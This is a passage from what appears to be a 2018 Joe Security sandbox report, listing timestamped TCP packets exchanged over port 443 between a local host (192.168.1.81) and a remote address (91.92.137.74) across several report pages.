Mai 7, 2018 14:49:53.475045919 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.475052118 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.475305080 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.475361109 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.475653887 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.475769997 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.531871080 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.531908035 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.531923056 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.531939030 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.531956911 MESZ 443 49164 91.92.137.74 192.168.1.81
Timestamp Source Port Dest Port Source IP Dest IP
Copyright Joe Security LLC 2018 Page 39 of 149
Mai 7, 2018 14:49:53.531970978 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.532010078 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.532025099 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.532058001 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.532072067 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.532084942 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.532190084 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.532238960 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.532808065 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.590961933 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.591044903 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.591061115 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.591082096 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.591099977 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.591114998 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.591155052 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.591171980 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.591187000 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.591200113 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.591213942 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.591227055 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.591259956 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.591809988 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.644042969 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.644067049 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.644083977 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.644098043 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.644113064 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.644128084 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.644154072 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.644162893 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.644171953 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.644180059 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.644187927 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.644385099 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.644449949 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.644751072 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.644864082 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.690891981 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.690924883 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.690931082 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.690937042 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.690943956 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.690949917 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.690968037 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.690973997 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.691006899 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.691034079 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.691047907 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.691258907 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.691325903 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.691669941 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.691785097 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.728300095 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.728332043 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.728349924 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.728378057 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.728389978 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.728396893 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.728425980 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.728450060 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.728482962 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.728499889 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.728538036 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.728781939 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.728822947 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.729146004 MESZ 49164 443 192.168.1.81 91.92.137.74
Timestamp Source Port Dest Port Source IP Dest IP
Copyright Joe Security LLC 2018 Page 40 of 149
Mai 7, 2018 14:49:53.729260921 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.769251108 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.769294024 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.769314051 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.769330025 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.769344091 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.769361973 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.769399881 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.769417048 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.769429922 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.769445896 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.769462109 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.769674063 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.769706011 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.770011902 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.770096064 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.811321020 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.811359882 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.811378002 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.811395884 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.811413050 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.811429977 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.811472893 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.811491013 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.811507940 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.811525106 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.811541080 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.811955929 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.812026978 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.812336922 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.812463999 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.856477022 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.856518030 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.856537104 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.856554031 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.856570005 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.856585979 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.856620073 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.856638908 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.856654882 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.856671095 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.856687069 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.857059002 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.857085943 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.857376099 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.857461929 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.898400068 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.898417950 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.898427010 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.898437023 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.898447037 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.898456097 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.898475885 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.898484945 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.898493052 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.898499012 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.898505926 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.898684978 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.898714066 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.898977995 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.899068117 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.933890104 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.933921099 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.933938026 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.933954000 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.933968067 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.933983088 MESZ 443 49164 91.92.137.74 192.168.1.81
Timestamp Source Port Dest Port Source IP Dest IP
Copyright Joe Security LLC 2018 Page 41 of 149
Mai 7, 2018 14:49:53.934032917 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.934048891 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.934062004 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.934077978 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.934094906 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.934166908 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.934190989 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.934828997 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.975362062 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.975390911 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.975413084 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.975431919 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.975450039 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.975467920 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.975534916 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.975554943 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.975572109 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.975589991 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.975613117 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.975728035 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.975815058 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.976135969 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.976272106 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.017394066 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.017425060 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.017440081 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.017455101 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.017469883 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.017489910 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.017529011 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.017541885 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.017586946 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.017605066 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.017617941 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.017788887 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.017868042 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.018203020 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.018316031 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.051266909 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.051306009 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.051323891 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.051337957 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.051351070 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.051363945 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.051399946 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.051414013 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.051434994 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.051448107 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.051460028 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.051486015 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.051517963 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.051964045 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.080727100 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.080754995 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.080771923 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.080782890 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.080794096 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.080806017 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.080832005 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.080843925 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.080854893 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.080866098 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.080876112 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.081202984 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.081245899 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.081315994 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.081872940 MESZ 49164 443 192.168.1.81 91.92.137.74
Timestamp Source Port Dest Port Source IP Dest IP
Copyright Joe Security LLC 2018 Page 42 of 149
Mai 7, 2018 14:49:54.093236923 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.113390923 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.113408089 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.113413095 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.113420010 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.113425016 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.113430023 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.113447905 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.113461018 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.113486052 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.113493919 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.113508940 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.113915920 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.113965988 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.114372015 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.147380114 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.147403955 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.147411108 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.147418022 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.147433043 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.147443056 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.147466898 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.147476912 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.147485971 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.147495031 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.147502899 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.147567987 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.147607088 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.151290894 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.170958042 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.171022892 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.171041012 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.171055079 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.171067953 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.171092987 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.171134949 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.171152115 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.171178102 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.171204090 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.171201944 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.171221972 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.171247005 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.171684980 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.204014063 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.204034090 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.204041958 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.204049110 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.204070091 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.204080105 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.204101086 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.204109907 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.204118013 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.204124928 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.204133034 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.204498053 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.221975088 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.221999884 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.222067118 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.236031055 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.236047029 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.236057997 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.236068010 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.236078024 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.236089945 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.236121893 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.236133099 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.236143112 MESZ 443 49164 91.92.137.74 192.168.1.81
Timestamp Source Port Dest Port Source IP Dest IP
Copyright Joe Security LLC 2018 Page 43 of 149
Mai 7, 2018 14:49:54.236154079 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.236164093 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.236263990 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.236291885 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.236521006 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.237157106 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.327577114 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.327615023 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.327642918 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.327656984 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.327670097 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.327685118 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.327728033 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.327743053 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.327758074 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.327771902 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.327796936 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.328093052 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.328119040 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.328367949 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.329133034 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.450129986 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.450149059 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.450156927 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.450164080 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.450171947 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.450179100 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.450201035 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.450208902 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.450217962 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.450225115 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.450232029 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.450582981 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.450606108 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.450865984 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.450937033 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.553405046 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.553430080 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.553446054 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.553459883 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.553473949 MESZ 443 49164 91.92.137.74 192.168.1.81
